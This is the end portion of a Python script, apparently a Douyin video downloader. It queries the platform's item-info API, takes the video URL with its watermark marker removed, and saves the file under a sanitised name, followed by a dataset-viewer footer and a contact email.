id_url = f'https://www.iesdouyin.com/web/api/v2/' \
f'aweme/iteminfo/?item_ids={new_url.split("/")[5]}'
data_json = request(id_url).json()
data = {
"mp3": data_json['item_list'][0]['music']['play_url']['uri'],
"mp4": data_json['item_list'][0]['video']['play_addr']['url_list'][0].replace("wm", ""),
"name": data_json['item_list'][0]['desc']
}
fileName = re.sub('[\/:*?"<>|]', '-', data['name'])
with open(f'{fileName}.mp4', 'wb') as f:
f.write(request(data['mp4']).content)
print("下载完成")
if __name__ == '__main__':
main()
| [
"once_simple@outlook.com"
] | once_simple@outlook.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.